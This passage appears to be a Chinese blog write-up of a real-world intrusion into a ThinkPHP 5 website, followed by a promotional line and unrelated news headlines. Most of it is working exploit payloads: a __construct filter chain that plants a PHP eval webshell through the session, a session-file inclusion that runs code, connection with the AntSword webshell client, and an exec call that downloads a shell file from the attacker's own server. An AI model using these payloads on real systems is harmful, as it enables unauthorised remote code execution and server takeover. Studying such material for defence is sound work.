_method=__construct&filter[
=think\\Session::set&method=get&get[
=<?php eval($_POST['c'
)?>&server[
=1


然后直接利用文件包含去包含session文件 ， tp5的session文件一般都是在/tmp下面 ， 文件名为sess_sessionid（这个sessionod在Cookie里面）
_method=__construct&method=get&filter[
=think\\__include_file&server[
=phpinfo&get[
=/tmp/sess_ejc3iali7uv3deo9g6ha8pbtoi&c=phpinfo();


成功执行 ， 接下来通过蚁剑连接即可

成功getshell

www权限

方法五上面拿到了shell ， 但是我还是再尝试了是否还有其他方法能getshell的 。 看到一篇文章 ， 是由于disable_function中没有禁用exec ， 然后利用exec从vps下载shell文件 。
于是我仔细看了下disable_function中禁用的函数 ， 巧了 ， 发现也没有禁用exec ， 那么试一下
首先在vps上创建一个test.php ， 并用python开放一个端口
python -m SimpleHTTPServer 8888


从vps上下载文件
s=wget vps/test.php&_method=__construct&method=get&filter[
=exec


成功下载到目标机器上
最后实战是比较好的学习方法 ， 通过对这个战点的渗透 ， 才知道tp5的站有挺多种方法的 ， 也学到了之前没有使用过的session包含 。 本次实战不仅仅为了getshell ， 也是为了学习利用tp5的不同的getshell方法 。
关注我 ， 持续更新——私我获取【网络安全学习资料·攻略】

• 微信又出新功能，事关支付限额
• 户外|“小眼镜”增多 专家支招教你科学用眼
• 单项冠军|再添三家“小巨人”，青岛高新区梯度培育见成效
• 领军企业|30个！中国科协发布2022年科技领域重大问题难题
• 零售业|确定涨价！iPhone14四款新机全面涨价！国行也在其中！
• 芯片|外媒：老美“加码”相关限制后，更为“棘手”的后果已经出现！
• 我国首个海洋油气装备投产！还有一批重大工程取得新进展→
• 苹果|苹果多款新品已提上日程
• 疫情期间获近亿元A轮投资，青浦这家企业数字化服务商乘“长三角数字干线”发展快车逆势上扬
• 【选购技巧】最高可省1600 苹果暑期教育优惠季保姆级攻略